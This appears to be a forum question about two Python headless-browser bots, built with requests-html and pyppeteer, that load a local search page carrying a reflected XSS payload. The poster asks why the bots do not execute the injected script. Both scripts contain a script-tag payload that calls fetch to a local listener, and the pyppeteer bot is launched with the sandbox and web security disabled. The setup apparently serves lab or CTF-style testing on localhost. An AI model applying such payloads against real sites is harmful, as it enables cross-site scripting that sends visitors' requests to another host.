So from some tutorials I came up with two bots that can execute javascript on a page. But the one using pyppeteer wont execute JS either from reflected or stored XSS while the requests-html bot only executes javascript from stored XSS. Requests-html bot:-
from requests_html import HTMLSession
session = HTMLSession()
resp = session.get('http://127.0.0.1/search.php?x=<script>fetch("http://127.0.0.1:8888")</script>')
# Run JavaScript code on webpage
resp.html.render()
Pyppeteer bot:-
from pyppeteer import launch
import asyncio
async def main():
browser = await launch(options={'args': ['--no-sandbox','--disable-web-security']}, headless=True)
url = 'http://127.0.0.1/search.php?x=<script>fetch("http://127.0.0.1:8888")</script>'
page = await browser.newPage()
response = await page.goto(url, options={
'timeout': 3000,
'waitUntil': 'load'})
print('response status: {}'.format(response.status))
await browser.close()
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
The point is both bots perfectly execute js present in the page from beginning the problem is with js through xss. My browser perfectly executes JS from both reflected and stored XSS.
So if anyone could help me figuring this out it would be great. Thanks in advance.
Note: I already tried args like --disable-web-security in the pyppeteer bot but unfortunately no result.